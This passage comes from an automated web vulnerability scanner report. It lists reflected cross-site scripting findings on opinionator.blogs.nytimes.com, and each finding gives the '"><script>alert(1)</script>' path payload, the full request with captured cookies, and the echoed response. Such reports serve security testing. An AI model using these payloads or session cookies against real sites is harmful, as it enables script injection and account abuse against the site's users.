The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e161d"><script>alert(1)</script>0900389e500 was submitted in the REST URL parameter 2. This input was echoed as e161d\"><script>alert(1)</script>0900389e500 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixese161d"><script>alert(1)</script>0900389e500 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixese161d\"><script>alert(1)</script>0900389e500&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/fixes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f0e"><script>alert(1)</script>bf23dd493d7 was submitted in the REST URL parameter 2. This input was echoed as d8f0e\"><script>alert(1)</script>bf23dd493d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixesd8f0e"><script>alert(1)</script>bf23dd493d7/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixesd8f0e\"><script>alert(1)</script>bf23dd493d7&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/fixes/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26950"><script>alert(1)</script>349cb5c2268 was submitted in the REST URL parameter 3. This input was echoed as 26950\"><script>alert(1)</script>349cb5c2268 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixes/feed26950"><script>alert(1)</script>349cb5c2268/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:22:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:22:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/feed26950\"><script>alert(1)</script>349cb5c2268&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/fixes/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f1b"><script>alert(1)</script>7880d35a107 was submitted in the REST URL parameter 3. This input was echoed as 66f1b\"><script>alert(1)</script>7880d35a107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/fixes/page66f1b"><script>alert(1)</script>7880d35a107/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/fixes/page66f1b\"><script>alert(1)</script>7880d35a107/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/home-fires

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a972"><script>alert(1)</script>0a1b042274f was submitted in the REST URL parameter 2. This input was echoed as 1a972\"><script>alert(1)</script>0a1b042274f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires1a972"><script>alert(1)</script>0a1b042274f HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires1a972\"><script>alert(1)</script>0a1b042274f&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/home-fires/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465db"><script>alert(1)</script>c3c7c9b644e was submitted in the REST URL parameter 2. This input was echoed as 465db\"><script>alert(1)</script>c3c7c9b644e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires465db"><script>alert(1)</script>c3c7c9b644e/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires465db\"><script>alert(1)</script>c3c7c9b644e&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/home-fires/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c78f"><script>alert(1)</script>40440eb34cb was submitted in the REST URL parameter 3. This input was echoed as 2c78f\"><script>alert(1)</script>40440eb34cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires/feed2c78f"><script>alert(1)</script>40440eb34cb/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:23:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:23:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires/feed2c78f\"><script>alert(1)</script>40440eb34cb&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/home-fires/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2385"><script>alert(1)</script>2952f429861 was submitted in the REST URL parameter 3. This input was echoed as f2385\"><script>alert(1)</script>2952f429861 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/home-fires/pagef2385"><script>alert(1)</script>2952f429861/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/home-fires/pagef2385\"><script>alert(1)</script>2952f429861/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.200. http://opinionator.blogs.nytimes.com/category/linda-greenhouse [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/linda-greenhouse

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c74"><script>alert(1)</script>11109981c61 was submitted in the REST URL parameter 2. This input was echoed as a3c74\"><script>alert(1)</script>11109981c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/linda-greenhousea3c74"><script>alert(1)</script>11109981c61 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:19:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:19:48 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/linda-greenhousea3c74\"><script>alert(1)</script>11109981c61&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.201. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/linda-greenhouse/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8e10"><script>alert(1)</script>f92f7baf431 was submitted in the REST URL parameter 2. This input was echoed as a8e10\"><script>alert(1)</script>f92f7baf431 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/linda-greenhousea8e10"><script>alert(1)</script>f92f7baf431/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:20:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:20:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
